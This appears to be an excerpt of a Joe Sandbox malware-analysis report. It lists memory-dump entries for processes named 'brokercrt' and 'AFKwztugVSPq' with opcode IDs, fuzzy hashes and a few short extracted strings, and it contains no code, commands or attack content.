                  • Instruction ID: 91f6464a1152d496a06f14ee3460e0e3ce09ac42251ea3fee202c829eb36db6c
                  • Opcode Fuzzy Hash: e528d7f5b69a1683d1d711a45abfc70e44ee4a49df1fe73b52fe1dde58cf6d7c
                  • Instruction Fuzzy Hash: 29112930908A0E9FEB88EF68D4496BE7BE1FF68345F50057AD41ED2190DB36B154CB84
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6cd85987c77b839754b2e64512af08a2bbc5c07a46a4dd17754586374a69eac5
                  • Instruction ID: a1393a00beb8d6748ea798ad5d61d7f87dbb95d679f3637259794d5afc230f11
                  • Opcode Fuzzy Hash: 6cd85987c77b839754b2e64512af08a2bbc5c07a46a4dd17754586374a69eac5
                  • Instruction Fuzzy Hash: 5F014C3090950E8EEB88EF24C0596FA77A1FF69345F50547ED40EC21D2DB76A990CB48
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ddb3a91a79d8bb82481e5ab6c10c8c2347b3558c7f0ce4a45a42a8d928361395
                  • Instruction ID: 75e088f3fa1aca642f4da6e37519bbb30d85f0625255371822ac707576684d13
                  • Opcode Fuzzy Hash: ddb3a91a79d8bb82481e5ab6c10c8c2347b3558c7f0ce4a45a42a8d928361395
                  • Instruction Fuzzy Hash: 5601DB3080D68A8FE742FBB888481A97BE0EF5A350F4909B2D00DC70E2EB38A8448710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID: 8mH
                  • API String ID: 0-1362847371
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID: PyH
                  • API String ID: 0-553442046
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID: PyH
                  • API String ID: 0-553442046
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID: >M_^
                  • API String ID: 0-4160910197
                  Uniqueness

                  Uniqueness Score: -1.00%

                  • Instruction Fuzzy Hash: 91F01970A1E6298EEB95EB18C455BA973B1FF58340F1042E6C40DD2296DF3499818B44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f9904877bd550994cd8ecd1717e44ddaf6126c1d80ddc53170ca3215ca1a4534
                  • Instruction ID: bc93f31ce800a6ae8226f5f604864b978414d08fbfb2e1dd42077607f869a153
                  • Opcode Fuzzy Hash: f9904877bd550994cd8ecd1717e44ddaf6126c1d80ddc53170ca3215ca1a4534
                  • Instruction Fuzzy Hash: 0DF0907080D68E8FEB59AF6488191B93BA1FF16252F4404BBE809C61D2EB389454C701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 60c66446edac25217a83bffb45d63349ad65d41c5b95426f2c67604afb556bec
                  • Instruction ID: 90cef54ee7635c188e2251ba8026c43fc42de52a5189d2b5acaa17eaa084dd10
                  • Opcode Fuzzy Hash: 60c66446edac25217a83bffb45d63349ad65d41c5b95426f2c67604afb556bec
                  • Instruction Fuzzy Hash: EDF0963080E7C94FE75AAF6488691B97FA1FF16245F4505BBD409C60D2EB389558C741
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e3d5fb10d4d69a04526a173139410312c5341945d816bd5cc363be7864131705
                  • Instruction ID: efbbb5ac49fc20225833c851065c952a0b6a7f9c3aed0b88fd3e084b5031f395
                  • Opcode Fuzzy Hash: e3d5fb10d4d69a04526a173139410312c5341945d816bd5cc363be7864131705
                  • Instruction Fuzzy Hash: C3F0173090D5098FEB54FB14C844BEEB6B1EB94355F105276D809A3295DF386A84CB98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9b0fcb454612bcaa26de96be15900819dabea62a5ef1036c4257cc9240e55741
                  • Instruction ID: cb055e65d08c48e63692360adf29c1989ff604d0a95db0646f34c56bcf48f4a2
                  • Opcode Fuzzy Hash: 9b0fcb454612bcaa26de96be15900819dabea62a5ef1036c4257cc9240e55741
                  • Instruction Fuzzy Hash: E3F0677095992E8EEFA4EB088840BBD76A1EB58342F5054BAC01DD32C1DB746A809F44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1f16ad9fa2eea7c007483a982431a8f12b5e7a5f1dca759bd8f6066dc86f6678
                  • Instruction ID: 2d659a73e2523c24a5bf82a2a863e56d84a88b15d6a5183edb4490858951d1d2
                  • Opcode Fuzzy Hash: 1f16ad9fa2eea7c007483a982431a8f12b5e7a5f1dca759bd8f6066dc86f6678
                  • Instruction Fuzzy Hash: 4FE04570958D2E8FDFA8EB188890BB977B1FB58302F5105AAC01DD3281DB745A808F04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID: $/$/
                  • API String ID: 0-1100692818
                  • Opcode ID: 1d2b140ac50c64ae734d0c2dcf17b6461eb6a3716f47087d92e4c2e52ba631ef
                  • Instruction ID: a5ca77d00808a2d58497a1d5015af8b2ca6e38ea810220df3c252b1007df9b08
                  • Opcode Fuzzy Hash: 1d2b140ac50c64ae734d0c2dcf17b6461eb6a3716f47087d92e4c2e52ba631ef
                  • Instruction Fuzzy Hash: 9631E274D0862A8EEB60EF64C8847EDBBF1AB44340F5041B6D44CA72C2DB389AC4DF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f0d000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID: &$h
                  • API String ID: 0-1895885708
                  • Opcode ID: 46666fb20749c5b59e34acb25aca662b66fe68343891492f7aebca58bae595a1
                  • Instruction ID: 917668f687d0a990b2116232ccd235905520c5fa2cc28de45b42626f0f4ff5b3
                  • Opcode Fuzzy Hash: 46666fb20749c5b59e34acb25aca662b66fe68343891492f7aebca58bae595a1
                  • Instruction Fuzzy Hash: D7E0E570D0C22A8FEFA8EB01C851BADB3B6AB44700F0040E8D40966280CB396E808F10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID: >P_^
                  • API String ID: 0-3975955286
                  • Opcode ID: 117007f5ec0debd21415d402d81a9f4820eda2630e559a61e53a3973697ddec1
                  • Instruction ID: 705afa025c60bf14f059f828897845d554d54770c4ad15ff778ce66d0e5b0e27
                  • Opcode Fuzzy Hash: 117007f5ec0debd21415d402d81a9f4820eda2630e559a61e53a3973697ddec1
                  • Instruction Fuzzy Hash: 25F02B3084D64E9FEB15AF6488952FA7794FF0A345F44093AE82DC11C2FB387554C791
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID: /
                  • API String ID: 0-2043925204
                  • Opcode ID: d77b0c46f11c00b1c22575dea386766ac6515fb3ca7f2e0b097cbb24085ba4c3
                  • Instruction ID: b7c0ded638df82816b5876e8beb37e0ee369bb9d645dcfd0efbc31f666b4cf66
                  • Opcode Fuzzy Hash: d77b0c46f11c00b1c22575dea386766ac6515fb3ca7f2e0b097cbb24085ba4c3
                  • Instruction Fuzzy Hash: 32F0E734908619CEEB14EF60C880BED77B1FB14351F5051AAD459E72C2DB786A84DF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ee15888e73f5f3002f50f3f3bc22bc76d18974647cb2bccc6d61a768f1954d54
                  • Instruction ID: e0d78956808055ef70ea01a74822566bdf3716a7dc287c3246135ba9e532fbed
                  • Opcode Fuzzy Hash: ee15888e73f5f3002f50f3f3bc22bc76d18974647cb2bccc6d61a768f1954d54
                  • Instruction Fuzzy Hash: EB51BE22D0E6C19FE317A77858A91A97FB0FF52354F0905FBC088CB0D3DA1CA8488366
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3bdcb719e8a67c40a5f636722053b0f3ed3a182e235c24231df796efda14ad36
                  • Instruction ID: e49d7e4742380f02c4677275da5e897f49fb050dfc1c002f7c85b8a1dec41c89
                  • Opcode Fuzzy Hash: 3bdcb719e8a67c40a5f636722053b0f3ed3a182e235c24231df796efda14ad36
                  • Instruction Fuzzy Hash: F7117C2180EBC69FE756AB7848651A97FB0AF12380F0905FBD488CA0D3DA1CA908C356
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f0d000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 48ed2e8facc846a1ced54679e7a3b104a46dfb35b74a473bc492c5b61a8407bc
                  • Instruction ID: d0451677c51ee44d0071a30a59b238b31cc2a71aaa24a7fc52151990061e956c
                  • Opcode Fuzzy Hash: 48ed2e8facc846a1ced54679e7a3b104a46dfb35b74a473bc492c5b61a8407bc
                  • Instruction Fuzzy Hash: D2E15871D1AA5A9FEB98EB68C4947B8B7B1FF59340F0441BAD00DD32C2DB386881CB55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 24efbdb1d26aff1084250c416340aca2e328702249ed3c9746c91872c2d9d6ad
                  • Instruction ID: 3a03333e0a36163021d32ec0cd0ac37b07306d81ceeae6d0bd57fbd99d681e91
                  • Opcode Fuzzy Hash: 24efbdb1d26aff1084250c416340aca2e328702249ed3c9746c91872c2d9d6ad
                  • Instruction Fuzzy Hash: C1D1A470D18A2D8EEBA4EB58C8557ECBBB1FB58351F5041BAD04DE3291DB386E858F04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2d6a1d82e890ca2a104cc6930d698816144d80d318513a87d1a685ef833581fe
                  • Instruction ID: 0ba3e6ccfb8aa36900a1eb2ad83d1eb34367bce900a0592e712a5e32882b8e7b
                  • Opcode Fuzzy Hash: 2d6a1d82e890ca2a104cc6930d698816144d80d318513a87d1a685ef833581fe
                  • Instruction Fuzzy Hash: 1681AC31A0CA8A8FDB58EF1C98515A977E2FF9A744F14457EE44DC32C2DE24AC428785
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 238cf4edabb8bf010e4d1279bb1438d6aa8f04a2ec09504b2eb0e8fecc2771d9
                  • Instruction ID: f389931879a2fcd55ea4dd1031341e66b30010d63ead073073973b589a0d5c1c
                  • Opcode Fuzzy Hash: 238cf4edabb8bf010e4d1279bb1438d6aa8f04a2ec09504b2eb0e8fecc2771d9
                  • Instruction Fuzzy Hash: 0051BD31A0CA898FDB48EF1888645AA77E2FB99344F14457ED44AC32C2DF34E8428785
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fcf1a92c33e9bed6d32c4939be5d9e8b3ee79a13ffd3fbb142fde89876e0625b
                  • Instruction ID: 6abacef544ca88d304a2aee4f5ab86ceef7a5579ed5e64d389959b3475c35dcf
                  • Opcode Fuzzy Hash: fcf1a92c33e9bed6d32c4939be5d9e8b3ee79a13ffd3fbb142fde89876e0625b
                  • Instruction Fuzzy Hash: 12512871D1895D8FEB94EBA8D8996BDB7F1FF68351F40007AD00DE3296DB34A8818B44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c3f37a22a819c0f9edca83dc1279e71563e9b104117b9640cf84314f8f8407d1
                  • Instruction ID: e23b16b9cf930211cdc961c9c7b4d7a57500c0acbd5e3ab0db1cb57adb3d2866
                  • Opcode Fuzzy Hash: c3f37a22a819c0f9edca83dc1279e71563e9b104117b9640cf84314f8f8407d1
                  • Instruction Fuzzy Hash: 43511670D0D61D8EEB54EBA8D4947EDBBB1FF59341F50007AD009E7291EB38A944CB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1fb718d9e1a0284cea660bd3f04824e3b90134842bf1a06247b82d1b98dfcc7b
                  • Instruction ID: b5c08df13f1b4a45891316a5c08db068d22806d4231763a60aa89e913d0ad576
                  • Opcode Fuzzy Hash: 1fb718d9e1a0284cea660bd3f04824e3b90134842bf1a06247b82d1b98dfcc7b
                  • Instruction Fuzzy Hash: 0E412936B0D6969EE701B72DA8591EA7FE0FFD1372F0404B7D288CB093DA285848C365
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c428fc099e05f6641ecb2394cb16b6a5270bb46f691eee6eb000e2525aeb2895
                  • Instruction ID: 432f7bbb36b7f14e459cb3e51faac75e91665d47408754268e9b9cfea9884ccb
                  • Opcode Fuzzy Hash: c428fc099e05f6641ecb2394cb16b6a5270bb46f691eee6eb000e2525aeb2895
                  • Instruction Fuzzy Hash: 0E415B31A0D64A5FE356EB7894451B9BBE1EF8A391F0540BBD44DC31D2EF28A8418365
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4c96dda044d32f91d6d4b6d49d352f014ec16489a3fa8021e371d0d34e367109
                  • Instruction ID: 16d910a6122a74ed762906ca9a7b6d2aaa47042df9693a0632f95ccaac3e6d5c
                  • Opcode Fuzzy Hash: 4c96dda044d32f91d6d4b6d49d352f014ec16489a3fa8021e371d0d34e367109
                  • Instruction Fuzzy Hash: 03418C31E1D84A9FEB85EB6CD4556BDBBE0FF5A380F4400BAD00AD72D2EF2868018715
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f0a000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3ff73f89c57477f1a809390664f4b6289e91be63e3cbf51dc33c4c54d86512c8
                  • Instruction ID: fb4d896b84b036e23838a7596e83c4dfaf7a0ff80ed858ebf6a6acc582dee218
                  • Opcode Fuzzy Hash: 3ff73f89c57477f1a809390664f4b6289e91be63e3cbf51dc33c4c54d86512c8
                  • Instruction Fuzzy Hash: DB31CE31D1E6868FE711EB7888191E97BE0FF16385F0804BAC469D71D3EF28A9488359
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cb776d9b000ca1fde7ae2319455f9d135e4a6fd5e8a95eeb075ac5830253e677
                  • Instruction ID: 4679fb639edf49d7ed15037032c4af4e2122f2d8e66c4f962be99e514f797571
                  • Opcode Fuzzy Hash: cb776d9b000ca1fde7ae2319455f9d135e4a6fd5e8a95eeb075ac5830253e677
                  • Instruction Fuzzy Hash: 3531B770D0991D8FDB94EFA8C895BACB7B1FB59340F5041AAC40DE3291EF3469848F44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: be659445aeb20dfc3ec74f80537b07dc1d248a95f7dd11ee4b6e505a051fcefd
                  • Instruction ID: f4fb2340260b5936b51c9d6bb447529afe8b33ab7ce273e3dc97af2612572db2
                  • Opcode Fuzzy Hash: be659445aeb20dfc3ec74f80537b07dc1d248a95f7dd11ee4b6e505a051fcefd
                  • Instruction Fuzzy Hash: 9021B33084C68E8FDB85EF24C858ABA7FF0FF29301F0400AAE459C7192DB34A551C740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1e52bd8dd86d629c0cd926fa9d580108b866e0d4dc79605a0489b1eeb92b273b
                  • Instruction ID: 3fab15b9ae9defd5c34a0f014c2fdf73f9287403b9f40d9fb3d8137eaf94d9b5
                  • Opcode Fuzzy Hash: 1e52bd8dd86d629c0cd926fa9d580108b866e0d4dc79605a0489b1eeb92b273b
                  • Instruction Fuzzy Hash: 4921903084E7CA5FD747ABB488282A57FB0EF17315F1940EBD449CA0E3DB295845C325
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a6b5f2e7e59c2b11794be2db1c2a09b70e9e44a94f9226db141ed615373a490a
                  • Instruction ID: fb75a15422e88f2e3430bfffdee151e84ab1dbcd4e50949d278cd4f8f9c10535
                  • Opcode Fuzzy Hash: a6b5f2e7e59c2b11794be2db1c2a09b70e9e44a94f9226db141ed615373a490a
                  • Instruction Fuzzy Hash: 75218C3084D7CA8FE743EB7888585A97FF0FF1B340F0944EAD449CB0A2EA289545C721
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 51b652085644826fc084f568e9ca26c5956a3f3680a0c14d0ccbb5ddc55a105f
                  • Instruction ID: 2e56ee65aa087fef0571cb6553a9c621e2cd33a06e2bf46dff4f08aafb6eba51
                  • Opcode Fuzzy Hash: 51b652085644826fc084f568e9ca26c5956a3f3680a0c14d0ccbb5ddc55a105f
                  • Instruction Fuzzy Hash: E111D371E189198FEBA4EB68D8457ACB7B2FB58344F5040AAD00DE3286DF386D858B44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3d3a2daf501c7a91d57e708ceb04d2e0b6fb5f16f4375ce6ff39fde7d2f6dfc8
                  • Instruction ID: 36a3326a481772268fbaa575451ae06897e1ade1ea064e269ef3b35ce4986a61
                  • Opcode Fuzzy Hash: 3d3a2daf501c7a91d57e708ceb04d2e0b6fb5f16f4375ce6ff39fde7d2f6dfc8
                  • Instruction Fuzzy Hash: F2117F3080D64E9FEB99EF28C4592B97BE1FF68341F1406BAD409C71D2DB38A944C785
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 377773c914b8877ea9ea1c382783776fb6a663cdf7559ad3fb5c73dce8774289
                  • Instruction ID: 230c59e09e75ae5ef1ab052d6d7d108391c5cf597e37bc43f79638f405dd190d
                  • Opcode Fuzzy Hash: 377773c914b8877ea9ea1c382783776fb6a663cdf7559ad3fb5c73dce8774289
                  • Instruction Fuzzy Hash: DD115830D0D54E9EE791FB68C8496BA7BA0FF9A385F4005B6D809D61D2EF38A5448744
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8471218185759e7d4e67109f8a88529ce85834429fcd714bd027026e95d788b1
                  • Instruction ID: eabd3bc3179d92daece2cfb3272b4989380f26e3627133ced2ebd4e2066f96ea
                  • Opcode Fuzzy Hash: 8471218185759e7d4e67109f8a88529ce85834429fcd714bd027026e95d788b1
                  • Instruction Fuzzy Hash: B711AC70C0D68E9FEB89EF2884592B97BA1FFA9341F4401BAD409D71D2DB38A940CB45
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
